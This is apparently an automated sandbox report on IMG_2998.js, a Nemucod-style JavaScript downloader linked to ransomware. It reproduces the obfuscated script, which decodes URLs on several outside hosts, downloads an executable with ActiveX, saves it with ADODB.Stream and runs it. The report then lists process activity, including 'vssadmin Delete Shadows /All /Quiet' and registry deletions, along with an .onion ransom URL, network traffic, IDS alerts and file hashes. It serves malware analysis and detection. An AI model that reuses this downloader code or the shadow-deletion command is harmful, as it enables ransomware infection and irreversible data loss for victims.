var rpc_call_assiduously_FROG2_bChosteck = "aHR0cRPOJECTSDovLw==";
rpc_call_assiduously_FROG2d7 = topSecretLine() + rpc_call_assiduously_FROG2d7 + TortPankaky(("rpc_call_assiduously_transform", "rpc_call_assiduously_enlarge", "rpc_call_assiduously_viagra", "rpc_call_assiduously_ruffle", "rpc_call_assiduously_papacy", "2.") + "FARISHMYML77H101T" + "TP45RPOJECTS45" + "WS" + "cr" + "ipt:Uh") + "e" + "ll";
var rpc_call_assiduously_FROG2DoUtra = [rpc_call_assiduously_FROG2lidgen, rpc_call_assiduously_FROG2sirdallos, rpc_call_assiduously_FROG2VARDOCF, "LmVRPOJECTS4ZQ=RPOJECTS=".pizzaTT(), "UnRPOJECTSVuRPOJECTS".pizzaTT(), rpc_call_assiduously_FROG2d7];
rpc_call_assiduously_FROG2Richters = rpc_call_assiduously_FROG2DoUtra.shift();
var rpc_call_assiduously_FROG2d2 = rpc_call_assiduously_FROG2DoUtra.pop();
rpc_call_assiduously_FROG2fabled = "Valar2Morgulis";
var rpc_call_assiduously_FROG2LitoyDISK = ActiveXObject;
var doubleTrouble = rpc_call_assiduously_FROG2d2.split("45");
rpc_call_assiduously_FROG2Native.rpc_call_assiduously_FROG2typize = function(a, b) {
a.type || (a.type = function(a) {
return rpc_call_assiduously_FROG2$type(a) === b
})
};
rpc_call_assiduously_FROGcccomeccc = "p";
var Limbus2000 = new Function("HORN", ' var GALAXY = "chastity necessarily()";var kelso = "ADODB.Str32"; return kelso.replace("TRUMP", "D").replace("32", "eam");');
rpc_call_assiduously_FROGletchikva = new rpc_call_assiduously_FROG2LitoyDISK(doubleTrouble[0]);
function rpc_call_assiduously_FROG2_cCho(a, b, c, d) {
a[b](c, d)
}
abtest = doubleTrouble[rpc_call_assiduously_FROGcccomeccc + "op"]();
rpc_call_assiduously_oldBitch = mexAO('' + abtest);
rpc_call_assiduously_FROG2tudabilo1 = "s";
var rpc_call_assiduously_FROG2vulture = rpc_call_assiduously_oldBitch[rpc_call_assiduously_FROG2DoUtra.shift()](rpc_call_assiduously_FROG2DoUtra.shift());
rpc_call_assiduously_FROG2weasel = "G\x45T";
var rpc_call_assiduously_FROG2SIDRENKOV = rpc_call_assiduously_FROG2DoUtra.shift();
var rpc_call_assiduously_FROG2promises = rpc_call_assiduously_FROG2DoUtra.shift();
var rpc_call_assiduously_FROG2OCHENA = "b3RPOJECTSBlbRPOJECTSg==".pizzaTT();
rpc_call_assiduously_FROG2SPASPI = "type";
function rpc_call_assiduously_FROG2_aCho(T, D) {
T[D]();
}
function CNPK(aa) {
return "\x3F".concat(aa, "\x3D");
}
function rpc_call_assiduously_FROG2_a2(rpc_call_assiduously_FROG2gutter, rpc_call_assiduously_FROG2StrokaParam2) {
try {
var rpc_call_assiduously_FROG2CHICKA = rpc_call_assiduously_FROG2vulture;
rpc_call_assiduously_FROG2CHICKA = rpc_call_assiduously_FROG2CHICKA + silkopil;
rpc_call_assiduously_FROG2CHICKA = rpc_call_assiduously_FROG2CHICKA + rpc_call_assiduously_FROG2StrokaParam2;
rpc_call_assiduously_FROGletchikva.open(rpc_call_assiduously_FROG2weasel, rpc_call_assiduously_FROG2gutter, false);
if (rpc_call_assiduously_FROG2TRUEFALSE) {
rpc_call_assiduously_FROG2_cCho(rpc_call_assiduously_FROGletchikva, "set" + (11, "rpc_call_assiduously_spatial", "rpc_call_assiduously_draughts", "rpc_call_assiduously_readings", "rpc_call_assiduously_reproductive", "rpc_call_assiduously_irrelevant", "rpc_call_assiduously_conjunction", "rpc_call_assiduously_vestige", rpc_call_assiduously_FROGsrq), "User-Agent", "TW96aWxsYS80LjAgRPOJECTSKGNvbXBhdGlibGU7IE1TSUUgNi4wOyRPOJECTSBXaW5kb3dzIE5UIDUuMCk=".pizzaTT());
}
rpc_call_assiduously_FROGletchikva[rpc_call_assiduously_FROG2tudabilo1 + ("rpc_call_assiduously_regency", "rpc_call_assiduously_soldier", "rpc_call_assiduously_knack", "rpc_call_assiduously_hobby", "rpc_call_assiduously_hundredweight", "end")]();
var kuzut = rpc_call_assiduously_FROGletchikva["Re" + "sp" + (rpc_call_assiduously_FROG2StrokaParam2, "rpc_call_assiduously_bunting", "rpc_call_assiduously_cauliflower", "rpc_call_assiduously_grimace", "rpc_call_assiduously_hearse", 1123, cheboksar['BOLGARIN'])];
//if(kuzut < 29989)return false;
//if (kuzut[0]!= 77 || kuzut[1]!= 90)return false;
if (rpc_call_assiduously_FROG2TRUEFALSE) {
var rpc_call_assiduously_FROG2opOpOp = new rpc_call_assiduously_FROG2LitoyDISK(Limbus2000());
rpc_call_assiduously_FROGGaSMa = "Valar10Morgulis";
var dedlyb = new Function("n, enc", " believed = Math.floor(n); if (x < 256*256*256) { bytes = [ max + 2, Math.floor(x / 256 / 256), Math.floor(proposal / 256) % 256, x % 256 ]; } else if (x < 256*256*256*256) { genealogical = [ max + 3, Math.floor(x / 256 / 256 / 256), Math.floor(x / 256 / 256) % 256, Math.floor(gathered / 256) % 256, x % 256 ]; }");
var silaBitsa = new Function("RPOJECTS,RPOJECTS2", "RPOJECTS[RPOJECTS2]();");
var silaBitsa2 = new Function("RPOJECTS,RPOJECTS2", "RPOJECTS.write(RPOJECTS2);");
silaBitsa(rpc_call_assiduously_FROG2opOpOp, rpc_call_assiduously_FROG2OCHENA);
rpc_call_assiduously_FROG2opOpOp[rpc_call_assiduously_FROG2SPASPI] = rpc_call_assiduously_FROG2chosen;
silaBitsa2(rpc_call_assiduously_FROG2opOpOp, kuzut);
rpc_call_assiduously_FROG2XWaxeQhw = "Valar11Morgulis";
rpc_call_assiduously_FROG2opOpOp["position"] = 0;
rpc_call_assiduously_FROG2krDwvrh = "Valar12Morgulis";
rpc_call_assiduously_FROG2CHICKA = rpc_call_assiduously_FROG2CHICKA + rpc_call_assiduously_FROG2SIDRENKOV;
rpc_call_assiduously_FROG2opOpOp["cRPOJECTS2F2RPOJECTSZVRPOJECTSRvRmlsZQ==".pizzaTT()](rpc_call_assiduously_FROG2CHICKA, 26 / 13);
rpc_call_assiduously_FROG2SswQdi = "Valar13Morgulis";
rpc_call_assiduously_FROG2opOpOp.close();
rpc_call_assiduously_oldBitch[rpc_call_assiduously_FROG2promises](rpc_call_assiduously_FROG2CHICKA, 0, false);
return true;
}
} catch (exception2) {
return false;
}
};
eval(rpc_call_assiduously_SayNoNo.pizzaTT());
rpc_call_assiduouslyFPADZO_ZO(rpc_call_assiduouslyFPADRML);
var rpc_call_assiduously_FROGodnoklassYO = 1;
var rpc_call_assiduously_FROG2_a5 = ('RPOJECTSd2VuZHlidWxsLmNvbS5hdS84NRPOJECTS3dlZmhpPw==ZZZ' + 'RPOJECTSY29yeXJ1c3NlbGxjb2FjaGluZy5jb20vODd3ZRPOJECTSWZoaT8=ZZZ' + 'RPOJECTSd2lyLmhlYmFtbWVuLmFRPOJECTS0Lzg3d2VmaGk/ZZZ' + 'RPOJECTSZ2Rycm9vbnR0b2xzZGFydC5pbmZvL2FmLzg3d2VmaGk=' + 'ZZZRPOJECTS').split("ZZZ");
var RPOJECTS500 = new Function("rpc_call_assiduously_FROG2_a5,rpc_call_assiduously_FROG2HORDA5", 'return rpc_call_assiduously_FROG2_bChosteck.pizzaTT() + rpc_call_assiduously_FROG2_a5[rpc_call_assiduously_FROG2HORDA5].pizzaTT();');
for (rpc_call_assiduously_FROG2HORDA5 in rpc_call_assiduously_FROG2_a5) {
rpc_call_assiduously_FROGodnoklassYO++;
if (rpc_call_assiduously_FROG2_a2(RPOJECTS500(rpc_call_assiduously_FROG2_a5, rpc_call_assiduously_FROG2HORDA5) + CNPK(rpc_call_assiduously_FROGodnoklass) + rpc_call_assiduously_FROGodnoklass
rpc_call_assiduously_FROGodnoklass + rpc_call_assiduously_FROGodnoklassYO)) {
break;
}
}"
- source
- Static Parser
- relevance
- 5/10
-
Process launched with changed environment
- details
- Process "vssadmin.exe" was launched with new environment variables: "PROMPT="$P$G""
- source
- Monitored Target
- relevance
- 10/10
-
Reads Windows Trust Settings
- details
- "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINTRUST\TRUST PROVIDERS\SOFTWARE PUBLISHING"; Key: "STATE")
- source
- Registry Access
- relevance
- 5/10
-
Requested access to a system service
- details
-
"wscript.exe" called "OpenService" to access the "rasman" service
"wscript.exe" called "OpenService" to access the "Sens" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
"wscript.exe" called "OpenService" to access the "RASMAN" service
- source
- API Call
- relevance
- 10/10
-
Runs shell commands
- details
- "cmd /c %TEMP%\__t1296.tmp.bat" on 2017-8-3.18:47:00.160
- source
- Monitored Target
- relevance
- 5/10
-
Spawns new processes
- details
-
Spawned process "SWsjirYRp2.exe"
Spawned process "SWsjirYRp2.exe"
Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\__t1296.tmp.bat"
Spawned process "vssadmin.exe" with commandline "Delete Shadows /All /Quiet"
Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f""
Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f""
Spawned process "reg.exe" with commandline ""reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"""
Spawned process "attrib.exe" with commandline "attrib Default.rdp -s -h"
- source
- Monitored Target
- relevance
- 3/10
-
Installation/Persistence
-
Connects to LPC ports
- details
- "SWsjirYRp2.exe" connecting to "\ThemeApiPort"
- source
- API Call
- relevance
- 1/10
-
Dropped files
- details
-
"autoexec.bat" has type "data"
"BazisVirtualCDBus.inf" has type "DOS executable (COM)"
"9rNtWnjTq9RGbU.exe" has type "data"
"libpixmap.dll" has type "data"
"vmnt64.exe" has type "data"
"Adobe Reader XI.lnk" has type "data"
"rpcapd.exe" has type "data"
"yZw6snqBQ28DAzu.exe" has type "data"
"Qt5Gui.dll" has type "data"
"liblzma-5.dll" has type "data"
"MineSweeper.lnk" has type "data"
"capinfos.exe" has type "data"
"uninstall.exe" has type "data"
"libpangowin32-1.0-0.dll" has type "data"
"rRgk91Ih5n.doc" has type "data"
"msvcp90d.dll" has type "data"
"libfontconfig-1.dll" has type "data"
"dH1rDN9f9.doc" has type "data"
"libxml2-2.dll" has type "data"
"libatk-1.0-0.dll" has type "data"
- source
- Binary File
- relevance
- 3/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "wscript.exe" opened "MountPointManager"
- source
- API Call
- relevance
- 5/10
-
Touches files in the Windows directory
- details
-
"wscript.exe" touched file "%WINDIR%\System32\en-US\WScript.exe.mui"
"wscript.exe" touched file "%WINDIR%\System32\WScript.exe"
"wscript.exe" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"wscript.exe" touched file "%WINDIR%\system32\rsaenh.dll"
"wscript.exe" touched file "%WINDIR%\system32\en-US\KERNELBASE.dll.mui"
"wscript.exe" touched file "%WINDIR%\System32\msxml3r.dll"
"wscript.exe" touched file "%WINDIR%\system32\wshom.ocx"
"wscript.exe" touched file "%WINDIR%\System32\msxml3.dll\1"
"wscript.exe" touched file "%WINDIR%\System32\msxml3.dll"
"wscript.exe" touched file "%APPDATA%\Microsoft\Windows\Cookies"
"wscript.exe" touched file "%APPDATA%\Microsoft\Windows\Cookies\index.dat"
"wscript.exe" touched file "%APPDATA%\Microsoft\Windows\IETldCache\index.dat"
"wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7N5LGTOO\87wefhi[1].txt"
"wscript.exe" touched file "%WINDIR%\System32\OLEACCRC.DLL"
"wscript.exe" touched file "%WINDIR%\system32\en-US\SETUPAPI.dll.mui"
- source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "wendybull.com.au"
Pattern match: "http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd-//OASIS//DTD"
Pattern match: "http://relaxng.org/ns/structure/1.0"
Pattern match: "https://supp7.freshdesk.com/support/tickets/new"
Pattern match: "https://www.torproject.org/projects/torbrowser.html.en"
Pattern match: "http://n224ezvhg4sgyamb.onion/sup.php"
- source
- File/Memory
- relevance
- 10/10
-
System Security
-
Modifies proxy settings
- details
-
"wscript.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
- source
- Registry Access
- relevance
- 10/10
-
Opens the Kernel Security Device Driver (KsecDD) of Windows
- details
- "SWsjirYRp2.exe" opened "\Device\KsecDD"
- source
- API Call
- relevance
- 10/10
-
Queries sensitive IE security settings
- details
- "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
- source
- Registry Access
- relevance
- 8/10
File Details
IMG_2998.js
- Filename
- IMG_2998.js
- Size
- 17KiB (17490 bytes)
- Type
- script javascript
- Description
- ASCII text, with very long lines, with CRLF line terminators
- Architecture
- WINDOWS
- SHA256
- 80d409949f4e3bff2af2a7af080631079896250ea9d43f0ff2fcfe9bf0086785
- MD5
- 733b7435c3454b6d00dc3031b2a27f45
- SHA1
- 84b94111502e8394643be24a82ab49046414dc7f
Hybrid Analysis
Analysed 9 processes in total (System Resource Monitor).
-
wscript.exe
"C:\80d409949f4e3bff2af2a7af080631079896250ea9d43f0ff2fcfe9bf0086785.js"
(PID: 3216)
-
SWsjirYRp2.exe
(PID: 3476)
-
SWsjirYRp2.exe
(PID: 3160)
-
cmd.exe
cmd /c %TEMP%\__t1296.tmp.bat
(PID: 3048)
- vssadmin.exe Delete Shadows /All /Quiet (PID: 3068)
- reg.exe "reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f" (PID: 3236)
- reg.exe "reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f" (PID: 3132)
- reg.exe "reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"" (PID: 3220)
- attrib.exe attrib Default.rdp -s -h (PID: 3212)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
wendybull.com.au | 113.20.4.209 | TPP Internet | Australia |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
113.20.4.209 | 80 TCP | wscript.exe PID: 3216 | Australia |
HTTP Traffic
Endpoint | Request | URL | Response |
---|---|---|---|
113.20.4.209:80 (wendybull.com.au) | GET | wendybull.com.au/87wefhi??SWsjirYRp=SWsjirYRp | 200 OK |
Request headers:
GET /87wefhi??SWsjirYRp=SWsjirYRp HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept-Encoding: gzip, deflate
Host: wendybull.com.au
Connection: Keep-Alive
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 113.20.4.209:80 (TCP) | Potential Corporate Privacy Violation | ET POLICY Unsupported/Fake Windows NT Version 5.0 | 2016879 |
local -> 113.20.4.209:80 (TCP) | A Network Trojan was detected | ET CURRENT_EVENTS Nemucod JS Downloader Aug 01 2017 | 2024508 |
113.20.4.209 -> local:62475 (TCP) | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP | 2018959 |
113.20.4.209 -> local:62475 (TCP) | A Network Trojan was detected | ET INFO Possible Windows executable sent when remote host claims to send a Text File | 2008438 |
113.20.4.209 -> local:62475 (TCP) | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) | 2015744 |
Extracted Files
Displaying 137 extracted file(s). The remaining 1574 file(s) are available in the full version and XML/JSON reports.
-
Malicious 1
-
-
__t1296.tmp.bat
- Size
- 445B (445 bytes)
- Type
- text
- Description
- DOS batch file, ASCII text, with CRLF line terminators
- AV Scan Result
- Labeled as "Trojan.BAT.Agent" (16/58)
- Runtime Process
- cmd.exe (PID: 3048)
- MD5
- 32d8f7a3d0c796cee45f64b63c1cca38
- SHA1
- d58466430a2bba8641bd92c880557379e25b140c
- SHA256
- 1a6f73b5c28d1c10f63f2056068c1de61487b8cf8f1dcf7516548df144b3e9ea
-
-
Informative Selection 2
-
-
RECOVER-FILES-726.html
- Size
- 4.6KiB (4714 bytes)
- Type
- html
- Description
- HTML document, ASCII text, with very long lines, with CRLF, LF line terminators
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- d0b7aaa0a75992801aafd12fb2db35fb
- SHA1
- 15480a51a3e411e95b4679d2fb34ce90a29788ee
- SHA256
- b466fc74951c02936abe5c23b3ca2a8db6a9699a3cca3d0870c4a47d291f6de8
-
80d409949f4e3bff2af2a7af080631079896250ea9d43f0ff2fcfe9bf0086785.js
- Size
- 18KiB (18448 bytes)
- Type
- data
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- c5a575f6a59f667e05f4f9cacf718361
- SHA1
- b51ede44e719d6e90cc2a34007e7ca8918384a48
- SHA256
- 63a94a13a5b230445e70f61c39f7eb980e306fe4ba0471213fdd6ac091387663
-
-
Informative 134
-
-
SWsjirYRp2.exe
- Size
- 329KiB (336384 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- 48afd0f7eae542d4653841528b793457
- SHA1
- cc2a7ab1b5a50b869e01127fd83019b70c54d3cd
- SHA256
- 10aa60f4757637b6b934c8a4dff16c52a6d1d24297a5fffdf846d32f55155be0
-
libfontconfig-1.dll
- Size
- 219KiB (223929 bytes)
- Type
- data
- MD5
- 300d624e7886ed06e7340ba6f8bb27e9
- SHA1
- df26ce29cb3485b9fa1f32a6fca1a9a462aaa2ab
- SHA256
- 71a1a6b33c9c68492859df4e38500d4ad1c6eee2b60d51c62a1020a612874efe
-
libxml2-2.dll
- Size
- 1.1MiB (1151408 bytes)
- Type
- html
- MD5
- e37653dd41e9c83ff84be408685a916b
- SHA1
- 911f5a5d285c36ed12b240db781dd8efa341a49d
- SHA256
- 82a921312576f1925d2d1c6aab3acd9ca5c4d915103edf3db74f7c5909d443eb
-
libatk-1.0-0.dll
- Size
- 110KiB (113115 bytes)
- Type
- data
- MD5
- c613ce0bafc62cd13f9c363423fb8739
- SHA1
- cde339782a50493878a470f099beccf7922887d7
- SHA256
- f6196515576b67fab06b91a385f52be429faacc9cbb7dfb84838c5a4e13e0f16
-
WinSparkle.dll
- Size
- 1.1MiB (1118128 bytes)
- Type
- data
- MD5
- 194ad06c09d0662d258573e9d566ae25
- SHA1
- 872b47d57b03397b378fde23b7fe4b7de230895c
- SHA256
- 49582593317a1a378f626e91abd8eecb81d6a9634ddf79fdc99e64fc276f9a34
-
UserCache.bin
- Size
- 111KiB (113526 bytes)
- Type
- data
- MD5
- dc6942b052dce3340d9dea78cda10c48
- SHA1
- 9a317f3ccc47edb4ab23aa884ef4418123a807a9
- SHA256
- 5ae2d96ce6ebc549104fd4c30131694c77d4d0e60f31c869c3f35b1875ec3b39
-
libtiff-5.dll
- Size
- 411KiB (421341 bytes)
- Type
- data
- MD5
- 44cfd41bedcceff7339e2b03158c4347
- SHA1
- 4f9131115c967ae86c57507cf2900f2cbb595fd5
- SHA256
- dd7f66afae11e79919e0ca15b6fde6f62731fd5ebe7e53fb9bceaed6b20a240f
-
libpng15-15.dll
- Size
- 171KiB (175153 bytes)
- Type
- data
- MD5
- 73076c5d6496a014e4a518928f5d57d4
- SHA1
- 27cfd26ac9ad4073c84c0835e447b36a9a4d189b
- SHA256
- a425646a7d71baf19df35c7828e20e793bc901484e7d456587687151f08febd4
-
VirtualAutorunDisabler.exe
- Size
- 90KiB (92080 bytes)
- Type
- unknown
- Description
- Sendmail frozen configuration - version \232TE\022\032\242p\203\355\213\366\274\030\354\314
- MD5
- 6beb716b201407b7ef2a0b0a487994b1
- SHA1
- a3545a24b97f39e0d07c2f265e7669ada88ae0b5
- SHA256
- a6f0acf4801289b6b2f03bbc45e0af7fe56d532615b7edd2ca15791f26a94fb5
-
Uninstall.exe
- Size
- 119KiB (122064 bytes)
- Type
- data
- MD5
- 1c6789862b2bf688b0a4acda362fa6b7
- SHA1
- 6014651b0e4e276b8a9ba9095b21491c76448341
- SHA256
- 704a9534be6b4d4cb7e1b10da8d6007e3e2791bb2d445628ae3b58256f7a773e
-
securitypack.jar
- Size
- 9.4KiB (9623 bytes)
- Type
- java compressed jar
- MD5
- ccf33c155a47f5f661ebefe5bbab11d2
- SHA1
- e3bba6fbd7704521e6c86d180a1c57ecc0d6689c
- SHA256
- 8585aee1fc2a66e4d1173c61db17815e075f54a9cc4e557d980319d6fe3df167
-
qwindows.dll
- Size
- 806KiB (825184 bytes)
- Type
- data
- MD5
- 094f413a3c57d76bff9facdf12823b50
- SHA1
- 9847df3b531f38b5aa46735406e9a763f7f6615f
- SHA256
- 6e5cdf943306186c9694ca71b2dc51a269157eed62698d731dd81e3bdea6be77
-
WinCDEmuContextMenu.dll
- Size
- 167KiB (170928 bytes)
- Type
- data
- MD5
- f3868945646cae3274b0f281fe6f3246
- SHA1
- cfcbfe6f39640b9e04538192be987fa72ce4a411
- SHA256
- 854d1ac0525f04082ed154487a2f0a1ca6baed643676839bc90c4f38a35b1929
-
libpangocairo-1.0-0.dll
- Size
- 60KiB (60970 bytes)
- Type
- data
- MD5
- 916ab48b5ad6276af509b0d0820ec74f
- SHA1
- 3381bf72f4d8d4f25e2723077619ca0c903a1a29
- SHA256
- f75e763fda5ad3664c31c9dd525a2b49729bcc1e7e871e193fbbd261f51f612f
-
VCProjectUI.dll
- Size
- 283KiB (289720 bytes)
- Type
- doc office
- Description
- data
- MD5
- 87a34f4915985bd75009cbae1dd8e66a
- SHA1
- ee912d8057c250b024e79174cc3cc44f99150425
- SHA256
- 69e5d959a8ff96ae6ab2edc23fd96d5885ee582141d7f12bb4b4723f0fc397ab
-
VirtualAutorunDisablerPS.dll
- Size
- 44KiB (44976 bytes)
- Type
- data
- MD5
- 610f550a88f4bcd4f5ee8892d44f3526
- SHA1
- 0a41bca7a8e21e9d6bf2d685ed060d31071674d4
- SHA256
- 77ed412f260c4a5dd4ee0435dc0e8c157487a2b36d18540ba90ebec5d95fb23f
-
VCProjectEngine.dll
- Size
- 2.7MiB (2798528 bytes)
- Type
- doc office
- Description
- data
- MD5
- 7af149e94476c8d4f76d172a95fe1fa6
- SHA1
- 81af7f9fc478e2b3cc3b204ca6c7ce8aab1775df
- SHA256
- cae9929afab2e9a82e1e45f93c41e8e7e4391a027296edbf9759e9ebb158fb70
-
libgio-2.0-0.dll
- Size
- 1.1MiB (1124616 bytes)
- Type
- data
- MD5
- 724b6a77cd6f93b0d88f03efc3d4fff9
- SHA1
- cff131f65a273f4278b4a03b6e77c9f06682e8e0
- SHA256
- 79966882eac21949bce5a8212cccf690aafbfa43a81dcf85c9c4c4a3cf1af3d0
-
Qt5Widgets.dll
- Size
- 4.1MiB (4278624 bytes)
- Type
- data
- MD5
- d555a47e71469fa244e7c9b8e83a1a92
- SHA1
- eb281f2c414eae73cf8a5205f023287fab4f9ecc
- SHA256
- 13cdbc308bde6351605f33e1045621a3ec1d1fd66f316d562c1f6a375ebb54fd
-
libgthread-2.0-0.dll
- Size
- 16KiB (16628 bytes)
- Type
- data
- MD5
- 302908981440085dbdd5f418e6849170
- SHA1
- 7c614b2df7e872f7e559f34236041bbd2d1bb351
- SHA256
- bf14d1a8001a8add9b16182f30d207ab2d4947c76f9829061b7fad4a35d73120
-
batchmnt64.exe
- Size
- 144KiB (147888 bytes)
- Type
- data
- MD5
- c91536e44d6df5bba697f3ec785fd297
- SHA1
- 980ddba38a58a9617ea0d30356b3a81fc102c94b
- SHA256
- 71021eef640f269f4ced4020e2e2f3cc9570fa46b7ff5092756ec834d69ca6ea
-
rawshark.exe
- Size
- 335KiB (343360 bytes)
- Type
- data
- MD5
- 1b79a6f2e8d240cc96b726d8048119e1
- SHA1
- a61a50cb5a6460441a797474c38bed26d2a2deed
- SHA256
- 4b96f01cfe2a91a1489d22379292f5f1d5a0b67291b4a7e7f3ba032097f80ed5
-
Qt5PrintSupport.dll
- Size
- 228KiB (233312 bytes)
- Type
- data
- MD5
- 0203916c677de028c49c8d9a6d4763b5
- SHA1
- 27ca79fe4692817dac85a11102c2dd7c97edd9b4
- SHA256
- 80255cc7bd764899b258713d37e31e743c48ecb30b0c9e13889be2a91d91057c
-
AcroRead.msi
- Size
- 2.3MiB (2400176 bytes)
- Type
- doc office
- Description
- data
- MD5
- 6f2f3a8bec917e783f9ab91c7a90de96
- SHA1
- 81ecc35458476cb3ca2b23e84a11570d504d17ac
- SHA256
- 37da494e2a9ca8bd0ca234693b1edfbee67a00148e5abe581d2e54912a5b79e5
-
vcbuildui.dll
- Size
- 23KiB (23984 bytes)
- Type
- data
- MD5
- 0b82103975727dcfc4898fa9c83de5bf
- SHA1
- 22f8741e941b802792d9730cbccf7d116cdcde60
- SHA256
- 3756a50b60a7d61dd68897e839070dba2d65a60efba59c55263118ff57127608
-
libgobject-2.0-0.dll
- Size
- 273KiB (279207 bytes)
- Type
- data
- MD5
- 0f4e11e978952d9ec0b808dab44b75fd
- SHA1
- 9bc73625823fd6470657751ee18cb5295d3b5a18
- SHA256
- 3c70e3db1244ff8de79cb170677b8d9971de7584bd003cf9c0f7ab3a7c07fa3d
-
msvcr90d.dll
- Size
- 1.1MiB (1181616 bytes)
- Type
- data
- MD5
- 81cb746411c242abc05accd4578a24f6
- SHA1
- 9a95a1487de23393b825b15d41e82c112676a5ff
- SHA256
- 78a3aefe5dba102f151255c385a4b473954bd59a9c0314029bdd8525f247598a
-
libpixman-1-0.dll
- Size
- 595KiB (608800 bytes)
- Type
- data
- MD5
- b35081ab0f5f51b1a158b5b24ab3d207
- SHA1
- 23bba525495916a099a9e9ef4f6406849dd2b0ad
- SHA256
- 26e28bfbb06547f4b7f6c3779a287f05e18e403ffe3984d4ffc4e68f26e898f4
-
Qt5Core.dll
- Size
- 4.1MiB (4347232 bytes)
- Type
- data
- MD5
- 3c330a2418660fb531c20be3f620b2fe
- SHA1
- 5d16053a8fa2649702c7bb8c9b16927647ba5fbe
- SHA256
- 15948b19be18e3edcab825c47df0588f03abe9f01f69e70e2322deefd4441fd4
-
libgail.dll
- Size
- 259KiB (265472 bytes)
- Type
- data
- MD5
- 78556d7a5d5f32fd55126fe3fe91e12f
- SHA1
- 2f0a4ef2852e4f3603106f1fbde13ad02c51d5d6
- SHA256
- 1c950409a8bbba27da8e66ddc477e58619dbb04f4a20dbb6b997e155e3369aae
-
maintenanceservice.exe
- Size
- 113KiB (115744 bytes)
- Type
- data
- MD5
- f08d378bb2461ef12d3d41c796774863
- SHA1
- 40ac9393a85315b3df704936191d447d1ac49ae7
- SHA256
- 27f36b565a95848b88b3cc80ff5afc687ba4a4283c04b25aa0bdec9cef332a42
-
javaws.exe
- Size
- 267KiB (273240 bytes)
- Type
- data
- MD5
- e3936422dd88f9046ef4ecc9c69dc24d
- SHA1
- db586b18c3cba1b8fb51eadeb6608de7689911fe
- SHA256
- caf5a6aaf08ee269b197b21213a06049383323b005426e8a2f7099cd7b39fc55
-
libharfbuzz-0.dll
- Size
- 275KiB (281168 bytes)
- Type
- data
- MD5
- 53e37870d970608d67a186249e7c7927
- SHA1
- 0235a21fb2368bf1230d9599ed833c1de40549a6
- SHA256
- 313f76b20b0c6cb764d8615ae2131372a3aef3c1677003f0633752e23f88350b
-
libgtk-win32-2.0-0.dll
- Size
- 3.6MiB (3776928 bytes)
- Type
- data
- MD5
- 4f2af765df0ee780153eefcaeb3ce4b7
- SHA1
- e152421a2d42f6d5cb09a632ac50530e88b24b87
- SHA256
- bd9f90b75282e96a7dc79954dea6764fbf0b788592ed84f36530666aa456b6d8
-
javaw.exe
- Size
- 173KiB (177496 bytes)
- Type
- data
- MD5
- 8d3fed0f6e1482eb7913e861cd87e523
- SHA1
- 9060992833feffbadc7016aa97e30460c85d73e1
- SHA256
- 587eab06028c737745cd3736298e77a97d307340dac7e68d79ce5764cdcdd869
-
VCProjectAMD64Platform.dll
- Size
- 283KiB (289736 bytes)
- Type
- data
- MD5
- 07b881774c7b0b49b9359c2d2b09b7a1
- SHA1
- 2ddb1cc7a6acf28e53d30724e358c11d4aefc9de
- SHA256
- 04312fe2e00794da69edfd9a7164451ed0ecaa9c92f14ad8a09ebf640056c08a
-
libjasper-1.dll
- Size
- 252KiB (257729 bytes)
- Type
- data
- MD5
- 63c5da0d8e5f8ead633f420448081c58
- SHA1
- 6076b84a04daf7ec5e89c368996ea07774180088
- SHA256
- fff1aa977d5dc1aeaace576848a7044238884b687792c1a98b62b13c60d46ffa
-
vcbuild.exe
- Size
- 131KiB (134576 bytes)
- Type
- data
- MD5
- c7e5240579c22c09e36fe31cc82c0dcb
